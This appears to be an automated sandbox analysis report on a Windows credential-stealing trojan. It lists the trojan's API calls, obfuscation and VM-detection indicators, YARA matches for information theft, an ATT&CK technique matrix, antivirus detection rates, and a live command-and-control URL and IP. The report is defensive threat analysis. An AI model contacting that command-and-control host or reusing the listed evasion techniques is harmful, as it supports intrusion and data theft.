              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
              Source: 8p5iD52knN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 8p5iD52knN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 8p5iD52knN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 8p5iD52knN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 8p5iD52knN.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\8p5iD52knN.exeUnpacked PE file: 0.2.8p5iD52knN.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.mysec3:W;.rsrc:R;.reloc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_00417B1A
              Source: 8p5iD52knN.exeStatic PE information: section name: .mysec3
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040D86E push 0040D89Ch; ret 0_2_0040D894
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040D870 push 0040D89Ch; ret 0_2_0040D894
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004140C0 push 004140ECh; ret 0_2_004140E4
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004108C8 push 004108F4h; ret 0_2_004108EC
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040B0F7 push 0040B124h; ret 0_2_0040B11C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040B0F8 push 0040B124h; ret 0_2_0040B11C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00408080 push 004080B8h; ret 0_2_004080B0
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00408158 push 00408196h; ret 0_2_0040818E
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00408970 push 004089E4h; ret 0_2_004089DC
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00408994 push 004089E4h; ret 0_2_004089DC
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004089AC push 004089E4h; ret 0_2_004089DC
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00415208 push 0041528Ch; ret 0_2_00415284
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040CA0C push 0040CA3Ch; ret 0_2_0040CA34
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040CA10 push 0040CA3Ch; ret 0_2_0040CA34
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00417AEC push 00417B18h; ret 0_2_00417B10
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00404BC0 push 00404C11h; ret 0_2_00404C09
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040D3C0 push 0040D3ECh; ret 0_2_0040D3E4
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040A3E4 push 0040A410h; ret 0_2_0040A408
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040C390 push 0040C3C0h; ret 0_2_0040C3B8
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040C394 push 0040C3C0h; ret 0_2_0040C3B8
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040A3AC push 0040A3D8h; ret 0_2_0040A3D0
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040DC44 push 0040DCA3h; ret 0_2_0040DC9B
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040DC0C push 0040DC38h; ret 0_2_0040DC30
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040B41E push 0040B44Ch; ret 0_2_0040B444
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040B420 push 0040B44Ch; ret 0_2_0040B444
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040A438 push 0040A464h; ret 0_2_0040A45C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0041A4F4 push 0041A51Ah; ret 0_2_0041A512
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00414C80 push 00414CACh; ret 0_2_00414CA4
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00409488 push 004094B8h; ret 0_2_004094B0
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0041A4AC push 0041A4E8h; ret 0_2_0041A4E0
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00418CB8 push 00418CE8h; ret 0_2_00418CE0
              Source: 8p5iD52knN.exeStatic PE information: section name: .text entropy: 6.975637092375793
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_00417B1A
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,0_2_0041303C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,0_2_004111C4
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,0_2_0041158C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,0_2_00411590
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,0_2_00412D9C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00416740 GetSystemInfo,0_2_00416740
              Source: Amcache.hve.3.drBinary or memory string: VMware
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp, 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000682000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.3.drBinary or memory string: vmci.sys
              Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.3.drBinary or memory string: VMware20,1
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_00417B1A
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00407A34 mov eax, dword ptr fs:[00000030h]0_2_00407A34
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00620B08 mov eax, dword ptr fs:[00000030h]0_2_00620B08
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_006206A3 mov eax, dword ptr fs:[00000030h]0_2_006206A3
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: GetLocaleInfoA,0_2_00404B4C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004381A5 PeekMessageA,GetConsoleAliasesW,CreateNamedPipeA,CreateMemoryResourceNotification,DlgDirSelectComboBoxExW,InsertMenuItemW,AppendMenuW,UnloadKeyboardLayout,SetRectRgn,ExtractAssociatedIconA,ExtractIconEx,FindFirstChangeNotificationW,GetRegisteredRawInputDevices,GetRegisteredRawInputDevices,GetNextDlgGroupItem,CallMsgFilter,OpenClipboard,GetClipboardSequenceNumber,GetLastError,DragQueryFileW,ShellAboutA,LoadMenuIndirectA,LoadIconW,MapVirtualKeyExW,StretchBlt,SetPixel,ShellExecuteA,BeginPaint,GetTickCount,GetSystemTimes,GetCPInfo,GlobalMemoryStatus,GetProcAddress,LoadLibraryA,GlobalAlloc,GlobalAlloc,VirtualProtect,GetStartupInfoW,SetProcessShutdownParameters,GetLastError,GetTickCount,0_2_004381A5
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004381A5 PeekMessageA,GetConsoleAliasesW,CreateNamedPipeA,CreateMemoryResourceNotification,DlgDirSelectComboBoxExW,InsertMenuItemW,AppendMenuW,UnloadKeyboardLayout,SetRectRgn,ExtractAssociatedIconA,ExtractIconEx,FindFirstChangeNotificationW,GetRegisteredRawInputDevices,GetRegisteredRawInputDevices,GetNextDlgGroupItem,CallMsgFilter,OpenClipboard,GetClipboardSequenceNumber,GetLastError,DragQueryFileW,ShellAboutA,LoadMenuIndirectA,LoadIconW,MapVirtualKeyExW,StretchBlt,SetPixel,ShellExecuteA,BeginPaint,GetTickCount,GetSystemTimes,GetCPInfo,GlobalMemoryStatus,GetProcAddress,LoadLibraryA,GlobalAlloc,GlobalAlloc,VirtualProtect,GetStartupInfoW,SetProcessShutdownParameters,GetLastError,GetTickCount,0_2_004381A5
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004065CC GetUserNameW,0_2_004065CC
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00420076 GetTimeZoneInformation,0_2_00420076
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,0_2_00404C15
              Source: C:\Users\user\Desktop\8p5iD52knN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 8p5iD52knN.exe PID: 7064, type: MEMORYSTR
              Source: Yara matchFile source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 8p5iD52knN.exe PID: 7064, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              DLL Side-Loading
              2
              Process Injection
              2
              Process Injection
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory11
              Security Software Discovery
              Remote Desktop Protocol1
              Clipboard Data
              2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Software Packing
              NTDS1
              Account Discovery
              Distributed Component Object ModelInput Capture112
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync15
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              8p5iD52knN.exe62%VirustotalBrowse
              8p5iD52knN.exe95%ReversingLabsWin32.Trojan.MintZamg
              8p5iD52knN.exe100%AviraHEUR/AGEN.1318101
              8p5iD52knN.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpCn0%Avira URL Cloudsafe
              http://51.15.241.168/0%Avira URL Cloudsafe
              http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php0%Avira URL Cloudsafe
              http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpmn0%Avira URL Cloudsafe
              https://dotbit.me/a/0%Avira URL Cloudsafe
              http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpl0%Avira URL Cloudsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phptrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpCn8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://upx.sf.netAmcache.hve.3.drfalse
                high
                http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpl8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpmn8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://51.15.241.168/8p5iD52knN.exe, 00000000.00000002.1908661617.000000000066A000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://ip-api.com/json8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmpfalse
                  high
                  https://dotbit.me/a/8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  51.15.241.168
                  unknownFrance
                  12876OnlineSASFRtrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1582990
                  Start date and time:2025-01-01 10:21:08 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 56s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:8p5iD52knN.exe
                  renamed because original name is a hash value
                  Original Sample Name:c30e2baf61f34324ccbd0b0168def45e.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@2/5@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 26
                  • Number of non-executed functions: 59
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.159.64, 20.109.210.53, 13.107.246.45
